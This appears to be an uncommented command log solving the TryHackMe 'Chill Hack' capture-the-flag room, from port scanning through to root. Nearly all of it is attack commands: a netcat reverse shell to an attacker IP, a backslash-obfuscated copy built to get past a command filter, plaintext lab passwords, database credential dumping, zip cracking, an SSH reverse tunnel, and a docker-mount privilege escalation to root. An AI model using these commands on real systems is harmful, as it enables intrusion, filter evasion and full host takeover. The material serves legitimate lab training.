TryHackMe: Chill Hack

nmap -Pn <target ip>
nmap -Pn -p1000- <target ip>
nmap -A -p21,22,80 <target ip>
nmap --script vuln -p21,22,80 <target ip>
/csss/images//js//secret/
ftp <target ip>
username: anonymous
ls -la
get note.txt
cat note.txt
ssh <target ip>
nikto -h http://<target ip>/
gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://<target ip>/ -x php,txt,html,sh,cgi,bak -q
tcpdump ip proto \\icmp -i tun0
ping -c 10 <attacker ip>
rlwrap nc -lvp 443
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <attacker ip> 443 >/tmp/f
r\m /t\m\p/f;m\k\f\i\f\o /t\m\p/f;c\a\t /t\m\p/f|/b\i\n/s\h -i 2>&1|n\c <attcker ip> 443 >/t\m\p/f
which python
which python3
python3 -c 'import pty;pty.spawn("/bin/bash");'
cat /var/www/files/index.php | less
su root
password: !@m+her00+@db
sudo -l
sudo /home/apaar/.helpline.sh
sudo -u apaar /home/apaar/.helpline.sh
/bin/bash
whoami
sudo -l
cd /home/apaar
ls -la
cat local.txt
mysql -uroot '-p!@m+her00+@db'
show databases;
use webportal;
show tables; -> users
select * from users;
su aurick
password: masterpassword
su anurodh
password: masterpassword
su apaar
password: dontaskdonttell
ss -tunpl
/etc/apache2/sites-enabled/
cd /etc/apache2/sites-enabled/
ls -la
cat 000-default.conf
systemctl start ssh.socket
systemctl status ssh.socket
ssh -R 9001:127.0.0.1:9001 <attacker user>@<attacker ip>
http://localhost:9001
username: Aurick
password: masterpassword
exiftool <filename>
steghide extract -sf ./<file> 
unzip backup.zip
fcrackzip   -u -v -D -p rockyou.txt backup.zip
cat source_code.php
su anurodh
password: !d0ntKn0wmYp@ssw0rd
id
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
whoami
cd /root
ls -la
cat proof.txt
